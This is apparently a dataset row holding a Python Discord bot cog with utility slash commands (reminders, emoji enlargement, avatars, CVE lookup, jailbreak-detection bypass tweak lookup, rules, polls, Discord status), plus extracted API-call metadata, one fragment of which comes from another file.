] | [((497, 562), 'wx.Font', 'wx.Font', (['wxtbx.default_font_size', 'wx.MODERN', 'wx.NORMAL', 'wx.NORMAL'], {}), '(wxtbx.default_font_size, wx.MODERN, wx.NORMAL, wx.NORMAL)\n', (504, 562), False, 'import wx\n'), ((1066, 1092), 'wx.TextCtrl.GetValue', 'wx.TextCtrl.GetValue', (['self'], {}), '(self)\n', (1086, 1092), False, 'import wx\n'), ((1100, 1124), 'wxtbx.is_unicode_build', 'wxtbx.is_unicode_build', ([], {}), '()\n', (1122, 1124), False, 'import wxtbx\n'), ((1987, 2019), 'wx.TextCtrl.Enable', 'wx.TextCtrl.Enable', (['self', 'enable'], {}), '(self, enable)\n', (2005, 2019), False, 'import wx\n'), ((2207, 2236), 'wx.PyValidator.__init__', 'wx.PyValidator.__init__', (['self'], {}), '(self)\n', (2230, 2236), False, 'import wx\n'), ((1139, 1150), 'libtbx.utils.to_str', 'to_str', (['val'], {}), '(val)\n', (1145, 1150), False, 'from libtbx.utils import Abort, to_unicode, to_str\n'), ((1587, 1594), 'libtbx.utils.Abort', 'Abort', ([], {}), '()\n', (1592, 1594), False, 'from libtbx.utils import Abort, to_unicode, to_str\n'), ((976, 999), 'libtbx.utils.to_unicode', 'to_unicode', (['saved_value'], {}), '(saved_value)\n', (986, 999), False, 'from libtbx.utils import Abort, to_unicode, to_str\n'), ((2920, 2943), 'libtbx.utils.to_unicode', 'to_unicode', (['reformatted'], {}), '(reformatted)\n', (2930, 2943), False, 'from libtbx.utils import Abort, to_unicode, to_str\n'), ((3017, 3066), 'wx.SystemSettings_GetColour', 'wx.SystemSettings_GetColour', (['wx.SYS_COLOUR_WINDOW'], {}), '(wx.SYS_COLOUR_WINDOW)\n', (3044, 3066), False, 'import wx\n'), ((3635, 3685), 'wx.MessageBox', 'wx.MessageBox', ([], {'caption': '"""Format error"""', 'message': 'msg'}), "(caption='Format error', message=msg)\n", (3648, 3685), False, 'import wx\n'), ((2744, 2793), 'wx.SystemSettings_GetColour', 'wx.SystemSettings_GetColour', (['wx.SYS_COLOUR_WINDOW'], {}), '(wx.SYS_COLOUR_WINDOW)\n', (2771, 2793), False, 'import wx\n')] |
import base64
import datetime
import io
import json
import traceback
import aiohttp
import discord
import pytimeparse
from data.services.guild_service import guild_service
from discord.commands import Option, slash_command, message_command, user_command
from discord.ext import commands
from discord.utils import format_dt
from PIL import Image
from utils.autocompleters import (bypass_autocomplete, get_ios_cfw,
rule_autocomplete)
from utils.config import cfg
from utils.context import BlooContext
from utils.logger import logger
from utils.menu import BypassMenu
from utils.permissions.checks import (PermissionsFailure, mod_and_up,
whisper, whisper_in_general)
from utils.permissions.permissions import permissions
from utils.permissions.slash_perms import slash_perms
from yarl import URL
class PFPView(discord.ui.View):
def __init__(self, ctx: BlooContext):
super().__init__(timeout=30)
self.ctx = ctx
async def on_timeout(self):
for child in self.children:
child.disabled = True
await self.ctx.respond_or_edit(view=self)
class PFPButton(discord.ui.Button):
def __init__(self, ctx: BlooContext, member: discord.Member):
super().__init__(label="Show other avatar", style=discord.ButtonStyle.primary)
self.ctx = ctx
self.member = member
self.other = False
async def callback(self, interaction: discord.Interaction):
if interaction.user != self.ctx.author:
return
if not self.other:
avatar = self.member.guild_avatar
self.other = not self.other
else:
avatar = self.member.avatar or self.member.default_avatar
self.other = not self.other
embed = interaction.message.embeds[0]
embed.set_image(url=avatar.replace(size=4096))
animated = ["gif", "png", "jpeg", "webp"]
not_animated = ["png", "jpeg", "webp"]
def fmt(format_):
return f"[{format_}]({avatar.replace(format=format_, size=4096)})"
if avatar.is_animated():
embed.description = f"View As\n {' '.join([fmt(format_) for format_ in animated])}"
else:
embed.description = f"View As\n {' '.join([fmt(format_) for format_ in not_animated])}"
await interaction.response.edit_message(embed=embed)
class BypassDropdown(discord.ui.Select):
def __init__(self, ctx, apps):
self.ctx = ctx
self.apps = {app.get("bundleId"): app for app in apps}
options = [
discord.SelectOption(label=app.get("name"), value=app.get("bundleId"), description="Bypasses found" if app.get("bypasses") else "No bypasses found", emoji='<:appstore:392027597648822281>') for app in apps
]
super().__init__(placeholder='Pick an app...',
min_values=1, max_values=1, options=options)
async def callback(self, interaction):
if interaction.user != self.ctx.author:
return
self.view.stop()
app = self.apps.get(self.values[0])
self.ctx.app = app
if not app.get("bypasses"):
await self.ctx.send_error("No bypasses found for this app!")
return
menu = BypassMenu(self.ctx, app.get("bypasses"), per_page=1,
page_formatter=format_bypass_page, whisper=self.ctx.whisper)
await menu.start()
async def on_timeout(self):
self.disabled = True
self.placeholder = "Timed out"
await self.ctx.edit(view=self._view)
def format_bypass_page(ctx, entries, current_page, all_pages):
ctx.current_bypass = entries[0]
embed = discord.Embed(title=ctx.app.get(
"name"), color=discord.Color.blue())
embed.set_thumbnail(url=ctx.app.get("icon"))
embed.description = f"You can use **{ctx.current_bypass.get('name')}**!"
if ctx.current_bypass.get("notes") is not None:
embed.add_field(name="Note", value=ctx.current_bypass.get('notes'))
embed.color = discord.Color.orange()
if ctx.current_bypass.get("version") is not None:
embed.add_field(name="Supported versions",
value=f"This bypass works on versions {ctx.current_bypass.get('version')} of the app")
embed.set_footer(
text=f"Powered by ios.cfw.guide • Bypass {current_page} of {len(all_pages)}")
return embed
class Misc(commands.Cog):
def __init__(self, bot):
self.bot = bot
self.spam_cooldown = commands.CooldownMapping.from_cooldown(
3, 15.0, commands.BucketType.channel)
try:
with open('emojis.json') as f:
self.emojis = json.loads(f.read())
except:
raise Exception(
"Could not find emojis.json. Make sure to run scrape_emojis.py")
@whisper()
@slash_command(guild_ids=[cfg.guild_id], description="Send yourself a reminder after a given time gap")
async def remindme(self, ctx: BlooContext, reminder: Option(str, description="What do you want to be reminded?"), duration: Option(str, description="When do we remind you? (i.e 1m, 1h, 1d)")):
"""Sends you a reminder after a given time gap
Example usage
-------------
/remindme 1h bake the cake
Parameters
----------
dur : str
"After when to send the reminder"
reminder : str
"What to remind you of"
"""
now = datetime.datetime.now()
delta = pytimeparse.parse(duration)
if delta is None:
raise commands.BadArgument(
"Please give me a valid time to remind you! (i.e 1h, 30m)")
time = now + datetime.timedelta(seconds=delta)
if time < now:
raise commands.BadArgument("Time has to be in the future >:(")
reminder = discord.utils.escape_markdown(reminder)
ctx.tasks.schedule_reminder(ctx.author.id, reminder, time)
# natural_time = humanize.naturaldelta(
# delta, minimum_unit='seconds')
embed = discord.Embed(title="Reminder set", color=discord.Color.random(
), description=f"We'll remind you {discord.utils.format_dt(time, style='R')}")
await ctx.respond(embed=embed, ephemeral=ctx.whisper, delete_after=5)
@slash_command(guild_ids=[cfg.guild_id], description="Post large version of a given emoji")
async def jumbo(self, ctx: BlooContext, emoji: str):
"""Posts large version of a given emoji
Example usage
-------------
/jumbo <emote>
Parameters
----------
emoji : str
"Emoji to enlarge"
"""
# non-mod users will be ratelimited
bot_chan = guild_service.get_guild().channel_botspam
if not permissions.has(ctx.guild, ctx.author, 5) and ctx.channel.id != bot_chan:
bucket = self.spam_cooldown.get_bucket(ctx.interaction)
if bucket.update_rate_limit():
raise commands.BadArgument("This command is on cooldown.")
# is this a regular Unicode emoji?
try:
em = await commands.PartialEmojiConverter().convert(ctx, emoji)
except commands.PartialEmojiConversionFailure:
em = emoji
if isinstance(em, str):
async with ctx.typing():
emoji_url_file = self.emojis.get(em)
if emoji_url_file is None:
raise commands.BadArgument(
"Couldn't find a suitable emoji.")
im = Image.open(io.BytesIO(base64.b64decode(emoji_url_file)))
image_conatiner = io.BytesIO()
im.save(image_conatiner, 'png')
image_conatiner.seek(0)
_file = discord.File(image_conatiner, filename='image.png')
await ctx.respond(file=_file)
else:
await ctx.respond(em.url)
@whisper()
@slash_command(guild_ids=[cfg.guild_id], description="Get avatar of another user or yourself.")
async def avatar(self, ctx: BlooContext, member: Option(discord.Member, description="User to get avatar of", required=False)) -> None:
"""Posts large version of a given emoji
Example usage
-------------
/avatar member:<member>
Parameters
----------
member : discord.Member, optional
"Member to get avatar of"
"""
if member is None:
member = ctx.author
await self.handle_avatar(ctx, member)
@whisper()
@user_command(guild_ids=[cfg.guild_id], name="View avatar")
async def avatar_rc(self, ctx: BlooContext, member: discord.Member):
await self.handle_avatar(ctx, member)
@whisper()
@message_command(guild_ids=[cfg.guild_id], name="View avatar")
async def avatar_msg(self, ctx: BlooContext, message: discord.Message):
await self.handle_avatar(ctx, message.author)
async def handle_avatar(self, ctx, member: discord.Member):
embed = discord.Embed(title=f"{member}'s avatar")
animated = ["gif", "png", "jpeg", "webp"]
not_animated = ["png", "jpeg", "webp"]
avatar = member.avatar or member.default_avatar
def fmt(format_):
return f"[{format_}]({avatar.replace(format=format_, size=4096)})"
if member.display_avatar.is_animated():
embed.description = f"View As\n {' '.join([fmt(format_) for format_ in animated])}"
else:
embed.description = f"View As\n {' '.join([fmt(format_) for format_ in not_animated])}"
embed.set_image(url=avatar.replace(size=4096))
embed.color = discord.Color.random()
view = PFPView(ctx)
if member.guild_avatar is not None:
view.add_item(PFPButton(ctx, member))
view.message = await ctx.respond(embed=embed, ephemeral=ctx.whisper, view=view)
@whisper_in_general()
@slash_command(guild_ids=[cfg.guild_id], description="View information about a CVE")
async def cve(self, ctx: BlooContext, id: str):
"""View information about a CVE
Example usage
-------------
/cve <id>
Parameters
----------
id : str
"ID of CVE to lookup"
"""
try:
async with aiohttp.ClientSession() as client:
async with client.get(URL(f'https://cve.circl.lu/api/cve/{id}', encoded=True)) as resp:
response = json.loads(await resp.text())
embed = discord.Embed(title=response.get(
'id'), color=discord.Color.random())
embed.description = response.get('summary')
embed.add_field(name="Published", value=response.get(
'Published'), inline=True)
embed.add_field(name="Last Modified",
value=response.get('Modified'), inline=True)
embed.add_field(name="Complexity", value=response.get(
'access').get('complexity').title(), inline=False)
embed.set_footer(text="Powered by https://cve.circl.lu")
await ctx.respond(embed=embed, ephemeral=ctx.whisper)
except Exception:
raise commands.BadArgument("Could not find CVE.")
@whisper_in_general()
@slash_command(guild_ids=[cfg.guild_id], description="Find out how to bypass jailbreak detection for an app")
async def bypass(self, ctx: BlooContext, app: Option(str, description="Name of the app", autocomplete=bypass_autocomplete)):
await ctx.defer(ephemeral=ctx.whisper)
data = await get_ios_cfw()
bypasses = data.get('bypass')
matching_apps = [body for _, body in bypasses.items() if app.lower() in body.get("name").lower()]
if not matching_apps:
raise commands.BadArgument(
"The API does not recognize that app or there are no bypasses available.")
# matching_app = bypasses[matching_apps[0]]
# print(matching_app)
if len(matching_apps) > 1:
view = discord.ui.View(timeout=30)
apps = matching_apps[:25]
apps.sort(key=lambda x: x.get("name"))
menu = BypassDropdown(ctx, apps)
view.add_item(menu)
view.on_timeout = menu.on_timeout
embed = discord.Embed(
description="Which app would you like to view bypasses for?", color=discord.Color.blurple())
await ctx.respond(embed=embed, view=view, ephemeral=ctx.whisper)
else:
ctx.app = matching_apps[0]
bypasses = ctx.app.get("bypasses")
if not bypasses or bypasses is None or bypasses == [None]:
raise commands.BadArgument(
f"{ctx.app.get('name')} has no bypasses.")
menu = BypassMenu(ctx, ctx.app.get(
"bypasses"), per_page=1, page_formatter=format_bypass_page, whisper=ctx.whisper)
await menu.start()
@slash_command(guild_ids=[cfg.guild_id], description="Post the embed for one of the rules")
async def rule(self, ctx: BlooContext, title: Option(str, autocomplete=rule_autocomplete), user_to_mention: Option(discord.Member, description="User to mention in the response", required=False)):
if title not in self.bot.rule_cache.cache:
potential_rules = [r for r in self.bot.rule_cache.cache if title.lower() == r.lower(
) or title.strip() == f"{r} - {self.bot.rule_cache.cache[r].description}"[:100].strip()]
if not potential_rules:
raise commands.BadArgument(
"Rule not found! Title must match one of the embeds exactly, use autocomplete to help!")
title = potential_rules[0]
embed = self.bot.rule_cache.cache[title]
if user_to_mention is not None:
title = f"Hey {user_to_mention.mention}, have a look at this!"
else:
title = None
await ctx.respond_or_edit(content=title, embed=embed)
@slash_command(guild_ids=[cfg.guild_id], description="Get the topic for a channel")
async def topic(self, ctx: BlooContext, channel: Option(discord.TextChannel, description="Channel to get the topic from", required=False), user_to_mention: Option(discord.Member, description="User to mention in the response", required=False)):
"""get the channel's topic"""
channel = channel or ctx.channel
if channel.topic is None:
raise commands.BadArgument(f"{channel.mention} has no topic!")
if user_to_mention is not None:
title = f"Hey {user_to_mention.mention}, have a look at this!"
else:
title = None
embed = discord.Embed(title=f"#{channel.name}'s topic",
description=channel.topic, color=discord.Color.blue())
await ctx.respond_or_edit(content=title, embed=embed)
@mod_and_up()
@slash_command(guild_ids=[cfg.guild_id], description="Start a poll", permissions=slash_perms.mod_and_up())
async def poll(self, ctx: BlooContext, question: str, channel: Option(discord.TextChannel, required=False, description="Where to post the message") = None):
if channel is None:
channel = ctx.channel
embed=discord.Embed(description=question, color=discord.Color.random())
embed.timestamp = datetime.datetime.now()
embed.set_footer(text=f"Poll started by {ctx.author}")
message = await channel.send(embed=embed)
emojis = ['⬆️', '⬇️']
for emoji in emojis:
await message.add_reaction(emoji)
ctx.whisper = True
await ctx.send_success("Done!")
@slash_command(guild_ids=[cfg.guild_id], description="View the status of various Discord features")
@commands.guild_only()
async def dstatus(self, ctx):
async with aiohttp.ClientSession() as session:
async with session.get("https://discordstatus.com/api/v2/components.json") as resp:
if resp.status == 200:
components = await resp.json()
async with aiohttp.ClientSession() as session:
async with session.get("https://discordstatus.com/api/v2/incidents.json") as resp:
if resp.status == 200:
incidents = await resp.json()
api_status = components.get('components')[0].get('status').title() # API
mp_status = components.get('components')[4].get('status').title() # Media Proxy
pn_status = components.get('components')[6].get('status').title() # Push Notifications
s_status = components.get('components')[8].get('status').title() # Search
v_status = components.get('components')[11].get('status').title() # Voice
cf_status = components.get('components')[2].get('status').title() # Cloudflare
title = "All Systems Operational" if api_status == "Operational" and mp_status == "Operational" and pn_status == "Operational" and s_status == "Operational" and v_status == "Operational" and cf_status == "Operational" else "Known Incident"
color = discord.Color.green() if title == "All Systems Operational" else discord.Color.orange()
last_incident = incidents.get('incidents')[0].get('name')
last_status = incidents.get('incidents')[0].get('status').title()
last_created = datetime.datetime.strptime(incidents.get('incidents')[0].get('created_at'), "%Y-%m-%dT%H:%M:%S.%f%z")
last_update = datetime.datetime.strptime(incidents.get('incidents')[0].get('updated_at'), "%Y-%m-%dT%H:%M:%S.%f%z")
last_impact = incidents.get('incidents')[0].get('impact')
online = '<:status_online:942288772551278623>'
offline = '<:status_dnd:942288811818352652>'
incident_icons = {'none': '<:status_offline:942288832051679302>',
'maintenance': '<:status_total:942290485916073995>',
'minor': '<:status_idle:942288787000680499>',
'major': '<:status_dnd:942288811818352652>',
'critical': '<:status_dnd:942288811818352652>'}
embed = discord.Embed(title=title, description=f"""
{online if api_status == 'Operational' else offline} **API:** {api_status}
{online if mp_status == 'Operational' else offline} **Media Proxy:** {mp_status}
{online if pn_status == 'Operational' else offline} **Push Notifications:** {pn_status}
{online if s_status == 'Operational' else offline} **Search:** {s_status}
{online if v_status == 'Operational' else offline} **Voice:** {v_status}
{online if cf_status == 'Operational' else offline} **Cloudflare:** {cf_status}
__**Last outage information**__
**Incident:** {incident_icons.get(last_impact)} {last_incident}
**Status:** {online if last_status == 'Resolved' else offline} {last_status}
**Identified at:** {format_dt(last_created, style='F')}
**{'Resolved at' if last_status == 'Resolved' else 'Last updated'}:** {format_dt(last_update, style='F')}
""", color=color)
embed.set_footer(text="Powered by discordstatus.com")
await ctx.respond(embed=embed)
@topic.error
@rule.error
@poll.error
@bypass.error
@cve.error
@dstatus.error
@remindme.error
@jumbo.error
@avatar.error
async def info_error(self, ctx: BlooContext, error):
if isinstance(error, discord.ApplicationCommandInvokeError):
error = error.original
if (isinstance(error, commands.MissingRequiredArgument)
or isinstance(error, PermissionsFailure)
or isinstance(error, commands.BadArgument)
or isinstance(error, commands.BadUnionArgument)
or isinstance(error, commands.MissingPermissions)
or isinstance(error, commands.BotMissingPermissions)
or isinstance(error, commands.MaxConcurrencyReached)
or isinstance(error, commands.NoPrivateMessage)):
await ctx.send_error(error)
else:
await ctx.send_error("A fatal error occured. Tell <@109705860275539968> about this.")
logger.error(traceback.format_exc())
def setup(bot):
bot.add_cog(Misc(bot))
| [
"discord.Color.blurple",
"discord.commands.user_command",
"discord.ext.commands.CooldownMapping.from_cooldown",
"utils.permissions.checks.whisper_in_general",
"io.BytesIO",
"utils.permissions.slash_perms.slash_perms.mod_and_up",
"data.services.guild_service.guild_service.get_guild",
"discord.utils.for... | [((4882, 4891), 'utils.permissions.checks.whisper', 'whisper', ([], {}), '()\n', (4889, 4891), False, 'from utils.permissions.checks import PermissionsFailure, mod_and_up, whisper, whisper_in_general\n'), ((4897, 5004), 'discord.commands.slash_command', 'slash_command', ([], {'guild_ids': '[cfg.guild_id]', 'description': '"""Send yourself a reminder after a given time gap"""'}), "(guild_ids=[cfg.guild_id], description=\n 'Send yourself a reminder after a given time gap')\n", (4910, 5004), False, 'from discord.commands import Option, slash_command, message_command, user_command\n'), ((6356, 6451), 'discord.commands.slash_command', 'slash_command', ([], {'guild_ids': '[cfg.guild_id]', 'description': '"""Post large version of a given emoji"""'}), "(guild_ids=[cfg.guild_id], description=\n 'Post large version of a given emoji')\n", (6369, 6451), False, 'from discord.commands import Option, slash_command, message_command, user_command\n'), ((7956, 7965), 'utils.permissions.checks.whisper', 'whisper', ([], {}), '()\n', (7963, 7965), False, 'from utils.permissions.checks import PermissionsFailure, mod_and_up, whisper, whisper_in_general\n'), ((7971, 8070), 'discord.commands.slash_command', 'slash_command', ([], {'guild_ids': '[cfg.guild_id]', 'description': '"""Get avatar of another user or yourself."""'}), "(guild_ids=[cfg.guild_id], description=\n 'Get avatar of another user or yourself.')\n", (7984, 8070), False, 'from discord.commands import Option, slash_command, message_command, user_command\n'), ((8574, 8583), 'utils.permissions.checks.whisper', 'whisper', ([], {}), '()\n', (8581, 8583), False, 'from utils.permissions.checks import PermissionsFailure, mod_and_up, whisper, whisper_in_general\n'), ((8589, 8647), 'discord.commands.user_command', 'user_command', ([], {'guild_ids': '[cfg.guild_id]', 'name': '"""View avatar"""'}), "(guild_ids=[cfg.guild_id], name='View avatar')\n", (8601, 8647), False, 'from discord.commands import Option, slash_command, message_command, user_command\n'), ((8773, 8782), 'utils.permissions.checks.whisper', 'whisper', ([], {}), '()\n', (8780, 8782), False, 'from utils.permissions.checks import PermissionsFailure, mod_and_up, whisper, whisper_in_general\n'), ((8788, 8849), 'discord.commands.message_command', 'message_command', ([], {'guild_ids': '[cfg.guild_id]', 'name': '"""View avatar"""'}), "(guild_ids=[cfg.guild_id], name='View avatar')\n", (8803, 8849), False, 'from discord.commands import Option, slash_command, message_command, user_command\n'), ((9943, 9963), 'utils.permissions.checks.whisper_in_general', 'whisper_in_general', ([], {}), '()\n', (9961, 9963), False, 'from utils.permissions.checks import PermissionsFailure, mod_and_up, whisper, whisper_in_general\n'), ((9969, 10057), 'discord.commands.slash_command', 'slash_command', ([], {'guild_ids': '[cfg.guild_id]', 'description': '"""View information about a CVE"""'}), "(guild_ids=[cfg.guild_id], description=\n 'View information about a CVE')\n", (9982, 10057), False, 'from discord.commands import Option, slash_command, message_command, user_command\n'), ((11393, 11413), 'utils.permissions.checks.whisper_in_general', 'whisper_in_general', ([], {}), '()\n', (11411, 11413), False, 'from utils.permissions.checks import PermissionsFailure, mod_and_up, whisper, whisper_in_general\n'), ((11419, 11532), 'discord.commands.slash_command', 'slash_command', ([], {'guild_ids': '[cfg.guild_id]', 'description': '"""Find out how to bypass jailbreak detection for an app"""'}), "(guild_ids=[cfg.guild_id], description=\n 'Find out how to bypass jailbreak detection for an app')\n", (11432, 11532), False, 'from discord.commands import Option, slash_command, message_command, user_command\n'), ((13104, 13199), 'discord.commands.slash_command', 'slash_command', ([], {'guild_ids': '[cfg.guild_id]', 'description': '"""Post the embed for one of the rules"""'}), "(guild_ids=[cfg.guild_id], description=\n 'Post the embed for one of the rules')\n", (13117, 13199), False, 'from discord.commands import Option, slash_command, message_command, user_command\n'), ((14146, 14233), 'discord.commands.slash_command', 'slash_command', ([], {'guild_ids': '[cfg.guild_id]', 'description': '"""Get the topic for a channel"""'}), "(guild_ids=[cfg.guild_id], description=\n 'Get the topic for a channel')\n", (14159, 14233), False, 'from discord.commands import Option, slash_command, message_command, user_command\n'), ((15038, 15050), 'utils.permissions.checks.mod_and_up', 'mod_and_up', ([], {}), '()\n', (15048, 15050), False, 'from utils.permissions.checks import PermissionsFailure, mod_and_up, whisper, whisper_in_general\n'), ((15810, 15913), 'discord.commands.slash_command', 'slash_command', ([], {'guild_ids': '[cfg.guild_id]', 'description': '"""View the status of various Discord features"""'}), "(guild_ids=[cfg.guild_id], description=\n 'View the status of various Discord features')\n", (15823, 15913), False, 'from discord.commands import Option, slash_command, message_command, user_command\n'), ((15914, 15935), 'discord.ext.commands.guild_only', 'commands.guild_only', ([], {}), '()\n', (15933, 15935), False, 'from discord.ext import commands\n'), ((4078, 4100), 'discord.Color.orange', 'discord.Color.orange', ([], {}), '()\n', (4098, 4100), False, 'import discord\n'), ((4552, 4628), 'discord.ext.commands.CooldownMapping.from_cooldown', 'commands.CooldownMapping.from_cooldown', (['(3)', '(15.0)', 'commands.BucketType.channel'], {}), '(3, 15.0, commands.BucketType.channel)\n', (4590, 4628), False, 'from discord.ext import commands\n'), ((5521, 5544), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (5542, 5544), False, 'import datetime\n'), ((5561, 5588), 'pytimeparse.parse', 'pytimeparse.parse', (['duration'], {}), '(duration)\n', (5578, 5588), False, 'import pytimeparse\n'), ((5904, 5943), 'discord.utils.escape_markdown', 'discord.utils.escape_markdown', (['reminder'], {}), '(reminder)\n', (5933, 5943), False, 'import discord\n'), ((9061, 9102), 'discord.Embed', 'discord.Embed', ([], {'title': 'f"""{member}\'s avatar"""'}), '(title=f"{member}\'s avatar")\n', (9074, 9102), False, 'import discord\n'), ((9702, 9724), 'discord.Color.random', 'discord.Color.random', ([], {}), '()\n', (9722, 9724), False, 'import discord\n'), ((15492, 15515), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (15513, 15515), False, 'import datetime\n'), ((3779, 3799), 'discord.Color.blue', 'discord.Color.blue', ([], {}), '()\n', (3797, 3799), False, 'import discord\n'), ((5057, 5116), 'discord.commands.Option', 'Option', (['str'], {'description': '"""What do you want to be reminded?"""'}), "(str, description='What do you want to be reminded?')\n", (5063, 5116), False, 'from discord.commands import Option, slash_command, message_command, user_command\n'), ((5128, 5194), 'discord.commands.Option', 'Option', (['str'], {'description': '"""When do we remind you? (i.e 1m, 1h, 1d)"""'}), "(str, description='When do we remind you? (i.e 1m, 1h, 1d)')\n", (5134, 5194), False, 'from discord.commands import Option, slash_command, message_command, user_command\n'), ((5633, 5718), 'discord.ext.commands.BadArgument', 'commands.BadArgument', (['"""Please give me a valid time to remind you! (i.e 1h, 30m)"""'], {}), "('Please give me a valid time to remind you! (i.e 1h, 30m)'\n )\n", (5653, 5718), False, 'from discord.ext import commands\n'), ((5753, 5786), 'datetime.timedelta', 'datetime.timedelta', ([], {'seconds': 'delta'}), '(seconds=delta)\n', (5771, 5786), False, 'import datetime\n'), ((5828, 5884), 'discord.ext.commands.BadArgument', 'commands.BadArgument', (['"""Time has to be in the future >:("""'], {}), "('Time has to be in the future >:(')\n", (5848, 5884), False, 'from discord.ext import commands\n'), ((6786, 6811), 'data.services.guild_service.guild_service.get_guild', 'guild_service.get_guild', ([], {}), '()\n', (6809, 6811), False, 'from data.services.guild_service import guild_service\n'), ((7691, 7703), 'io.BytesIO', 'io.BytesIO', ([], {}), '()\n', (7701, 7703), False, 'import io\n'), ((7804, 7855), 'discord.File', 'discord.File', (['image_conatiner'], {'filename': '"""image.png"""'}), "(image_conatiner, filename='image.png')\n", (7816, 7855), False, 'import discord\n'), ((8119, 8194), 'discord.commands.Option', 'Option', (['discord.Member'], {'description': '"""User to get avatar of"""', 'required': '(False)'}), "(discord.Member, description='User to get avatar of', required=False)\n", (8125, 8194), False, 'from discord.commands import Option, slash_command, message_command, user_command\n'), ((11578, 11654), 'discord.commands.Option', 'Option', (['str'], {'description': '"""Name of the app"""', 'autocomplete': 'bypass_autocomplete'}), "(str, description='Name of the app', autocomplete=bypass_autocomplete)\n", (11584, 11654), False, 'from discord.commands import Option, slash_command, message_command, user_command\n'), ((11725, 11738), 'utils.autocompleters.get_ios_cfw', 'get_ios_cfw', ([], {}), '()\n', (11736, 11738), False, 'from utils.autocompleters import bypass_autocomplete, get_ios_cfw, rule_autocomplete\n'), ((11932, 12032), 'discord.ext.commands.BadArgument', 'commands.BadArgument', (['"""The API does not recognize that app or there are no bypasses available."""'], {}), "(\n 'The API does not recognize that app or there are no bypasses available.')\n", (11952, 12032), False, 'from discord.ext import commands\n'), ((12182, 12209), 'discord.ui.View', 'discord.ui.View', ([], {'timeout': '(30)'}), '(timeout=30)\n', (12197, 12209), False, 'import discord\n'), ((13245, 13288), 'discord.commands.Option', 'Option', (['str'], {'autocomplete': 'rule_autocomplete'}), '(str, autocomplete=rule_autocomplete)\n', (13251, 13288), False, 'from discord.commands import Option, slash_command, message_command, user_command\n'), ((13307, 13396), 'discord.commands.Option', 'Option', (['discord.Member'], {'description': '"""User to mention in the response"""', 'required': '(False)'}), "(discord.Member, description='User to mention in the response',\n required=False)\n", (13313, 13396), False, 'from discord.commands import Option, slash_command, message_command, user_command\n'), ((14282, 14374), 'discord.commands.Option', 'Option', (['discord.TextChannel'], {'description': '"""Channel to get the topic from"""', 'required': '(False)'}), "(discord.TextChannel, description='Channel to get the topic from',\n required=False)\n", (14288, 14374), False, 'from discord.commands import Option, slash_command, message_command, user_command\n'), ((14389, 14478), 'discord.commands.Option', 'Option', (['discord.Member'], {'description': '"""User to mention in the response"""', 'required': '(False)'}), "(discord.Member, description='User to mention in the response',\n required=False)\n", (14395, 14478), False, 'from discord.commands import Option, slash_command, message_command, user_command\n'), ((14608, 14664), 'discord.ext.commands.BadArgument', 'commands.BadArgument', (['f"""{channel.mention} has no topic!"""'], {}), "(f'{channel.mention} has no topic!')\n", (14628, 14664), False, 'from discord.ext import commands\n'), ((15229, 15318), 'discord.commands.Option', 'Option', (['discord.TextChannel'], {'required': '(False)', 'description': '"""Where to post the message"""'}), "(discord.TextChannel, required=False, description=\n 'Where to post the message')\n", (15235, 15318), False, 'from discord.commands import Option, slash_command, message_command, user_command\n'), ((15136, 15160), 'utils.permissions.slash_perms.slash_perms.mod_and_up', 'slash_perms.mod_and_up', ([], {}), '()\n', (15158, 15160), False, 'from utils.permissions.slash_perms import slash_perms\n'), ((15989, 16012), 'aiohttp.ClientSession', 'aiohttp.ClientSession', ([], {}), '()\n', (16010, 16012), False, 'import aiohttp\n'), ((16231, 16254), 'aiohttp.ClientSession', 'aiohttp.ClientSession', ([], {}), '()\n', (16252, 16254), False, 'import aiohttp\n'), ((17232, 17253), 'discord.Color.green', 'discord.Color.green', ([], {}), '()\n', (17251, 17253), False, 'import discord\n'), ((17297, 17319), 'discord.Color.orange', 'discord.Color.orange', ([], {}), '()\n', (17317, 17319), False, 'import discord\n'), ((6163, 6185), 'discord.Color.random', 'discord.Color.random', ([], {}), '()\n', (6183, 6185), False, 'import discord\n'), ((6843, 6884), 'utils.permissions.permissions.permissions.has', 'permissions.has', (['ctx.guild', 'ctx.author', '(5)'], {}), '(ctx.guild, ctx.author, 5)\n', (6858, 6884), False, 'from utils.permissions.permissions import permissions\n'), ((7050, 7102), 'discord.ext.commands.BadArgument', 'commands.BadArgument', (['"""This command is on cooldown."""'], {}), "('This command is on cooldown.')\n", (7070, 7102), False, 'from discord.ext import commands\n'), ((10347, 10370), 'aiohttp.ClientSession', 'aiohttp.ClientSession', ([], {}), '()\n', (10368, 10370), False, 'import aiohttp\n'), ((11343, 11386), 'discord.ext.commands.BadArgument', 'commands.BadArgument', (['"""Could not find CVE."""'], {}), "('Could not find CVE.')\n", (11363, 11386), False, 'from discord.ext import commands\n'), ((13702, 13821), 'discord.ext.commands.BadArgument', 'commands.BadArgument', (['"""Rule not found! Title must match one of the embeds exactly, use autocomplete to help!"""'], {}), "(\n 'Rule not found! Title must match one of the embeds exactly, use autocomplete to help!'\n )\n", (13722, 13821), False, 'from discord.ext import commands\n'), ((14948, 14968), 'discord.Color.blue', 'discord.Color.blue', ([], {}), '()\n', (14966, 14968), False, 'import discord\n'), ((15442, 15464), 'discord.Color.random', 'discord.Color.random', ([], {}), '()\n', (15462, 15464), False, 'import discord\n'), ((20166, 20188), 'traceback.format_exc', 'traceback.format_exc', ([], {}), '()\n', (20186, 20188), False, 'import traceback\n'), ((7505, 7560), 'discord.ext.commands.BadArgument', 'commands.BadArgument', (['"""Couldn\'t find a suitable emoji."""'], {}), '("Couldn\'t find a suitable emoji.")\n', (7525, 7560), False, 'from discord.ext import commands\n'), ((7626, 7658), 'base64.b64decode', 'base64.b64decode', (['emoji_url_file'], {}), '(emoji_url_file)\n', (7642, 7658), False, 'import base64\n'), ((12541, 12564), 'discord.Color.blurple', 'discord.Color.blurple', ([], {}), '()\n', (12562, 12564), False, 'import discord\n'), ((6228, 6268), 'discord.utils.format_dt', 'discord.utils.format_dt', (['time'], {'style': '"""R"""'}), "(time, style='R')\n", (6251, 6268), False, 'import discord\n'), ((7183, 7215), 'discord.ext.commands.PartialEmojiConverter', 'commands.PartialEmojiConverter', ([], {}), '()\n', (7213, 7215), False, 'from discord.ext import commands\n'), ((10420, 10475), 'yarl.URL', 'URL', (['f"""https://cve.circl.lu/api/cve/{id}"""'], {'encoded': '(True)'}), "(f'https://cve.circl.lu/api/cve/{id}', encoded=True)\n", (10423, 10475), False, 'from yarl import URL\n'), ((18945, 18979), 'discord.utils.format_dt', 'format_dt', (['last_created'], {'style': '"""F"""'}), 